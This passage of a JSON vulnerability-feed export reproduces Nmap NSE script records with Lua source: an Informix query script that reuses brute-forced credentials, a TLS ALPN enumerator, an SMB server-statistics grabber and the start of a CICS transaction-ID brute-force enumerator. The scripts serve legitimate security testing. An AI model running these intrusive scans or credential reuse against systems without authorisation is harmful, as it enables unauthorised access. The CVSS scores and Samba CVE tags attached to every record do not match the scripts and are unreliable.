"NMAP:INFORMIX-QUERY.NSE", "href": "https://nmap.org/nsedoc/scripts/informix-query.html", "sourceData": 
"local informix = require \"informix\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nRuns a query against IBM Informix Dynamic Server using the given\nauthentication credentials (see also: informix-brute).\n]]\n\n---\n-- @usage\n-- nmap -p 9088 <host> --script informix-query --script-args informix-query.username=informix,informix-query.password=informix\n--\n-- @output\n-- PORT STATE SERVICE\n-- 9088/tcp open unknown syn-ack\n-- | informix-query:\n-- | Information\n-- | User: informix\n-- | Database: sysmaster\n-- | Query: \"SELECT FIRST 1 DBINFO('dbhostname') hostname, DBINFO('version','full') version FROM systables\"\n-- | Results\n-- | hostname version\n-- |_ patrik-laptop IBM Informix Dynamic Server Version 11.50.UC4E\n--\n-- @args informix-query.username The username used for authentication\n-- @args informix-query.password The password used for authentication\n-- @args informix-query.database The name of the database to connect to\n-- (default: sysmaster)\n-- @args informix-query.query The query to run against the server\n-- (default: returns hostname and version)\n-- @args informix-query.instance The name of the instance to connect to\n\n-- Version 0.1\n\n-- Created 07/28/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"auth\"}\ndependencies = { \"informix-brute\" }\n\n\nportrule = shortport.port_or_service( { 1526, 9088, 9090, 9092 }, \"informix\", \"tcp\", \"open\")\n\naction = function( host, port )\n local instance = stdnse.get_script_args('informix-info.instance')\n local helper\n local status, data\n local result = {}\n local user = stdnse.get_script_args('informix-query.username')\n local pass = stdnse.get_script_args('informix-query.password')\n local query = 
stdnse.get_script_args('informix-query.query')\n local db = stdnse.get_script_args('informix-query.database') or \"sysmaster\"\n\n query = query or \"SELECT FIRST 1 DBINFO('dbhostname') hostname, \" ..\n \"DBINFO('version','full') version FROM systables\"\n\n helper = informix.Helper:new( host, port, instance )\n\n -- If no user was specified lookup the first user in the registry saved by\n -- the informix-brute script\n if ( not(user) ) then\n if ( nmap.registry['informix-brute'] and nmap.registry['informix-brute'][1][\"username\"] ) then\n user = nmap.registry['informix-brute'][1][\"username\"]\n pass = nmap.registry['informix-brute'][1][\"password\"]\n else\n return stdnse.format_output(false, \"No credentials specified (see informix-table.username and informix-table.password)\")\n end\n end\n\n status, data = helper:Connect()\n if ( not(status) ) then\n return stdnse.format_output(status, data)\n end\n\n status, data = helper:Login(user, pass, nil, db)\n if ( not(status) ) then return stdnse.format_output(status, data) end\n\n status, data = helper:Query(query)\n if ( not(status) ) then return stdnse.format_output(status, data) end\n\n for _, rs in ipairs(data) do\n table.insert( result, { \"User: \" .. user, \"Database: \" .. db, ( \"Query: \\\"%s\\\"\" ):format( rs.query ), name=\"Information\" } )\n local tmp = informix.Util.formatTable( rs )\n tmp.name = \"Results\"\n table.insert( result, tmp )\n end\n\n\n return stdnse.format_output(status, result)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:31:01", "description": "Enumerates a TLS server's supported application-layer protocols using the ALPN protocol. \n\nRepeated queries are sent to determine which of the registered protocols are supported. 
\n\nFor more information, see: \n\n * <https://tools.ietf.org/html/rfc7301>\n\n## Script Arguments \n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the [mssql](<../lib/mssql.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### smtp.domain \n\nSee the documentation for the [smtp](<../lib/smtp.html#script-args>) library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### tls.servername \n\nSee the documentation for the [tls](<../lib/tls.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script=tls-alpn <targets>\n \n\n## Script Output \n \n \n 443/tcp open https\n | tls-alpn:\n | h2\n | spdy/3\n |_ http/1.1\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n * [sslcert](<../lib/sslcert.html>)\n * [tls](<../lib/tls.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-10-30T17:27:44", "type": "nmap", "title": "tls-alpn NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2021-07-02T20:01:30", "id": "NMAP:TLS-ALPN.NSE", "href": "https://nmap.org/nsedoc/scripts/tls-alpn.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal sslcert = require \"sslcert\"\nlocal tls = require \"tls\"\n\ndescription = [[\nEnumerates a TLS server's supported application-layer protocols using the ALPN protocol.\n\nRepeated queries are sent to determine which of the registered protocols are supported.\n\nFor more information, see:\n* https://tools.ietf.org/html/rfc7301\n]]\n\n---\n-- @usage\n-- nmap --script=tls-alpn <targets>\n--\n--@output\n-- 443/tcp open https\n-- | tls-alpn:\n-- | h2\n-- | spdy/3\n-- |_ http/1.1\n--\n-- @xmloutput\n-- <elem>h2</elem>\n-- <elem>spdy/3</elem>\n-- <elem>http/1.1</elem>\n\n\nauthor = \"Daniel Miller\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"discovery\", \"safe\", \"default\"}\ndependencies = {\"https-redirect\"}\n\nportrule = function(host, port)\n return shortport.ssl(host, port) or sslcert.getPrepareTLSWithoutReconnect(port)\nend\n\n\nlocal ALPN_NAME = \"application_layer_protocol_negotiation\"\n\n--- Function that sends a client hello packet with the TLS ALPN extension to the\n-- target host and returns the response\n--@args host The target host table.\n--@args port The target port table.\n--@return status true if response, false else.\n--@return response if status is true.\nlocal client_hello = function(host, port, protos)\n local sock, status, response, err, cli_h\n\n cli_h = 
tls.client_hello({\n -- TLSv1.3 does not send this extension plaintext.\n -- TODO: implement key exchange crypto to retrieve encrypted extensions\n protocol = \"TLSv1.2\",\n [\"extensions\"] = {\n [ALPN_NAME] = tls.EXTENSION_HELPERS[ALPN_NAME](protos)\n },\n })\n\n -- Connect to the target server\n local status, err\n local sock\n local specialized = sslcert.getPrepareTLSWithoutReconnect(port)\n if specialized then\n status, sock = specialized(host, port)\n if not status then\n stdnse.debug1(\"Connection to server failed: %s\", sock)\n return false\n end\n else\n sock = nmap.new_socket()\n status, err = sock:connect(host, port)\n if not status then\n stdnse.debug1(\"Connection to server failed: %s\", err)\n return false\n end\n end\n\n sock:set_timeout(5000)\n\n -- Send Client Hello to the target server\n status, err = sock:send(cli_h)\n if not status then\n stdnse.debug1(\"Couldn't send: %s\", err)\n sock:close()\n return false\n end\n\n -- Read response\n status, response, err = tls.record_buffer(sock)\n if not status then\n stdnse.debug1(\"Couldn't receive: %s\", err)\n sock:close()\n return false\n end\n\n return true, response\nend\n\n--- Function that checks for the returned protocols to a ALPN extension request.\n--@args response Response to parse.\n--@return results List of found protocols.\nlocal check_alpn = function(response)\n local i, record = tls.record_read(response, 1)\n if record == nil then\n stdnse.debug1(\"Unknown response from server\")\n return nil\n end\n\n if record.type == \"handshake\" and record.body[1].type == \"server_hello\" then\n if record.body[1].extensions == nil then\n stdnse.debug1(\"Server did not return TLS ALPN extension.\")\n return nil\n end\n local results = {}\n local alpndata = record.body[1].extensions[ALPN_NAME]\n if alpndata == nil then\n stdnse.debug1(\"Server did not return TLS ALPN extension.\")\n return nil\n end\n -- Parse data\n alpndata = string.unpack(\">s2\", alpndata, 1)\n i = 1\n while i <= #alpndata do\n if 
i > 1 then\n stdnse.debug1(\"Server sent multiple protocols but RFC only permits 1\")\n end\n local protocol\n protocol, i = string.unpack(\">s1\", alpndata, i)\n table.insert(results, protocol)\n end\n\n if next(results) then\n return results\n else\n stdnse.debug1(\"Server supports TLS ALPN extension, but no protocols were offered.\")\n return nil\n end\n else\n stdnse.debug1(\"Server response was not server_hello\")\n return nil\n end\nend\n\nlocal function find_and_remove(t, value)\n for i, v in ipairs(t) do\n if v == value then\n table.remove(t, i)\n return true\n end\n end\n return false\nend\n\naction = function(host, port)\n local alpn_protos = {\n -- IANA-registered names\n -- https://www.iana.org/assignments/tls-extensiontype-values/alpn-protocol-ids.csv\n -- Last-Modified: Thu, 31 Oct 2019 22:30:11 GMT\n \"http/0.9\",\n \"http/1.0\",\n \"http/1.1\",\n \"spdy/1\",\n \"spdy/2\",\n \"spdy/3\",\n \"stun.turn\",\n \"stun.nat-discovery\",\n \"h2\",\n \"h2c\", -- should never be negotiated over TLS\n \"webrtc\",\n \"c-webrtc\",\n \"ftp\",\n \"imap\",\n \"pop3\",\n \"managesieve\",\n \"coap\",\n \"xmpp-client\",\n \"xmpp-server\",\n \"acme-tls/1\",\n \"mqtt\",\n -- Other sources\n \"grpc-exp\", -- gRPC, see grpc.io\n }\n\n local chosen = {}\n local unique = {}\n while next(alpn_protos) do\n -- Send crafted client hello\n local status, response = client_hello(host, port, alpn_protos)\n if status and response then\n -- Analyze response\n local result = check_alpn(response)\n if not result then\n stdnse.debug1(\"None of %d protocols chosen\", #alpn_protos)\n goto ALPN_DONE\n end\n for i, p in ipairs(result) do\n if i > 1 then\n stdnse.verbose1(\"Server violates RFC: sent additional protocol %s\", p)\n else\n if not unique[p] then\n chosen[#chosen+1] = p\n end\n unique[p] = true\n if not find_and_remove(alpn_protos, p) then\n stdnse.debug1(\"Chosen ALPN protocol %s was not offered\", p)\n -- Server is forcing this protocol, no need to continue offering.\n goto 
ALPN_DONE\n end\n end\n end\n else\n stdnse.debug1(\"Client hello failed with %d protocols\", #alpn_protos)\n goto ALPN_DONE\n end\n end\n ::ALPN_DONE::\n if next(chosen) then\n return chosen\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:35:13", "description": "Attempts to grab the server's statistics over SMB and MSRPC, which uses TCP ports 445 or 139. \n\nAn administrator account is required to pull these statistics on most versions of Windows, and Vista and above require UAC to be turned down. \n\nSome of the numbers returned here don't feel right to me, but they're definitely the numbers that Windows returns. Take the values here with a grain of salt. \n\nThese statistics are found using a single call to a SRVSVC function, `NetServerGetStatistics`. This packet is parsed incorrectly by Wireshark, up to version 1.0.3 (and possibly higher).\n\n## Script Arguments \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap --script smb-server-stats.nse -p445 <host>\n sudo nmap -sU -sS --script smb-server-stats.nse -p U:137,T:139 <host>\n \n\n## Script Output \n \n \n Host script results:\n | smb-server-stats:\n | | Server statistics collected since 2009-09-22 09:56:00 (48d5h53m36s):\n | | | 6513655 bytes (1.56 b/s) sent, 40075383 bytes (9.61 b/s) received\n |_ |_ |_ 19323 failed logins, 179 permission errors, 0 system errors, 0 print jobs, 2921 files opened\n \n\n## Requires \n\n * [msrpc](<../lib/msrpc.html>)\n * [smb](<../lib/smb.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2008-11-06T02:52:59", "type": "nmap", "title": "smb-server-stats NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:SMB-SERVER-STATS.NSE", "href": "https://nmap.org/nsedoc/scripts/smb-server-stats.html", "sourceData": "local msrpc = require \"msrpc\"\nlocal smb = require \"smb\"\nlocal stdnse = require \"stdnse\"\nlocal string = require 
\"string\"\nlocal table = require \"table\"\n\ndescription = [[\nAttempts to grab the server's statistics over SMB and MSRPC, which uses TCP\nports 445 or 139.\n\nAn administrator account is required to pull these statistics on most versions\nof Windows, and Vista and above require UAC to be turned down.\n\nSome of the numbers returned here don't feel right to me, but they're definitely\nthe numbers that Windows returns. Take the values here with a grain of salt.\n\nThese statistics are found using a single call to a SRVSVC function,\n<code>NetServerGetStatistics</code>. This packet is parsed incorrectly by Wireshark,\nup to version 1.0.3 (and possibly higher).\n]]\n\n---\n-- @usage\n-- nmap --script smb-server-stats.nse -p445 <host>\n-- sudo nmap -sU -sS --script smb-server-stats.nse -p U:137,T:139 <host>\n--\n-- @output\n-- Host script results:\n-- | smb-server-stats:\n-- | | Server statistics collected since 2009-09-22 09:56:00 (48d5h53m36s):\n-- | | | 6513655 bytes (1.56 b/s) sent, 40075383 bytes (9.61 b/s) received\n-- |_ |_ |_ 19323 failed logins, 179 permission errors, 0 system errors, 0 print jobs, 2921 files opened\n-----------------------------------------------------------------------\n\nauthor = \"Ron Bowes\"\ncopyright = \"Ron Bowes\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\",\"intrusive\"}\ndependencies = {\"smb-brute\"}\n\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\naction = function(host)\n\n local result, stats\n local response = {}\n local subresponse = {}\n\n result, stats = msrpc.get_server_stats(host)\n\n if(result == false) then\n return stdnse.format_output(false, response)\n end\n\n table.insert(response, string.format(\"Server statistics collected since %s (%s):\", stats['start_str'], stats['period_str']))\n table.insert(subresponse, string.format(\"%d bytes (%.2f b/s) sent, %d bytes (%.2f b/s) received\", stats['bytessent'], stats['bytessentpersecond'], 
stats['bytesrcvd'], stats['bytesrcvdpersecond']))\n table.insert(subresponse, string.format(\"%d failed logins, %d permission errors, %d system errors, %d print jobs, %d files opened\", stats['pwerrors'], stats['permerrors'], stats['syserrors'], stats['jobsqueued'], stats['fopens']))\n table.insert(response, subresponse)\n\n return stdnse.format_output(true, response)\nend\n\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:31", "description": "CICS transaction ID enumerator for IBM mainframes. This script is based on mainframe_brute by Dominic White (<https://github.com/sensepost/mainframe_brute>). However, this script doesn't rely on any third party libraries or tools and instead uses the NSE TN3270 library which emulates a TN3270 screen in lua. \n\nCICS only allows for 4 byte transaction IDs, that is the only specific rule found for CICS transaction IDs.\n\n## Script Arguments \n\n#### cics-enum.commands \n\nCommands in a semi-colon separated list needed to access CICS. Defaults to `CICS`.\n\n#### cics-enum.path \n\nFolder used to store valid transaction id 'screenshots' Defaults to `None` and doesn't store anything.\n\n#### idlist \n\nPath to list of transaction IDs. Defaults to the list of CICS transactions from IBM.\n\n#### cics-enum.pass \n\nPassword to use for authenticated enumeration\n\n#### cics-enum.user \n\nUsername to use for authenticated enumeration\n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap --script=cics-enum -p 23 <targets>\n \n nmap --script=cics-enum --script-args=idlist=default_cics.txt,\n cics-enum.command=\"exit;logon applid(cics42)\",\n cics-enum.path=\"/home/dade/screenshots/\",cics-enum.noSSL=true -p 23 <targets>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 23/tcp open tn3270\n | cics-enum:\n | Accounts:\n | CBAM: Valid - CICS Transaction ID\n | CETR: Valid - CICS Transaction ID\n | CEST: Valid - CICS Transaction ID\n | CMSG: Valid - CICS Transaction ID\n | CEDA: Valid - CICS Transaction ID\n | CEDF: Potentially Valid - CICS Transaction ID\n | DSNC: Valid - CICS Transaction ID\n |_ Statistics: Performed 31 guesses in 114 seconds, average tps: 0\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [shortport](<../lib/shortport.html>)\n * [tn3270](<../lib/tn3270.html>)\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [unpwdb](<../lib/unpwdb.html>)\n * [io](<>)\n * [table](<>)\n * [string](<>)\n * [stringaux](<../lib/stringaux.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-08T21:27:09", "type": "nmap", "title": "cics-enum NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-03-21T04:07:55", "id": "NMAP:CICS-ENUM.NSE", "href": "https://nmap.org/nsedoc/scripts/cics-enum.html", "sourceData": "local nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal shortport = require \"shortport\"\nlocal tn3270 = require \"tn3270\"\nlocal brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal unpwdb = require \"unpwdb\"\nlocal io = require \"io\"\nlocal table = require \"table\"\nlocal string = require \"string\"\nlocal stringaux = require \"stringaux\"\n\n\ndescription = [[\nCICS transaction ID enumerator for IBM mainframes.\nThis script is based o